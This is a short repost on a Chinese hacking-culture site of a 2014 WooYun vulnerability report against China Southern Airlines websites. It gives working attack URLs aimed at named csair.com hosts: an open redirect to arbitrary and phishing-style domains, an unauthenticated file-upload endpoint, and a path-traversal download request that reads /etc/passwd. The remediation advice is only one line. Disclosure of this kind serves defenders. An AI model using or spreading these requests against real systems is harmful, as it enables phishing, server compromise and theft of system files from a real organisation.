记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

中国南方航空多个漏洞合集(任意文件读取等)

2014-05-25 20:25

任意地址跳转:

http://big5.csair.com/SuniT/www.baidu.com/index.html

http://big5.csair.com/SuniT/fish.cccsair.com/钓鱼.html

任意文件上传:

http://olcs2.csair.com/upload.php

QQ截图20140410133236.jpg

已经上传不确定文件位置。

漏洞证明:

文件下载:

http://www.csair.com/en/tourguide/before_ready/destination/download/download.php?FileName=download.php

http://www.csair.com/en/tourguide/before_ready/destination/download/download.php?FileName=../../../../../../../../../../../../../../../../etc/passwd

clipboard.png

修复方案:

都需要加入权限判断,不能直接访问。

知识来源: www.wooyun.org/bugs/wooyun-2014-056538

阅读:69175 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“中国南方航空多个漏洞合集(任意文件读取等)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云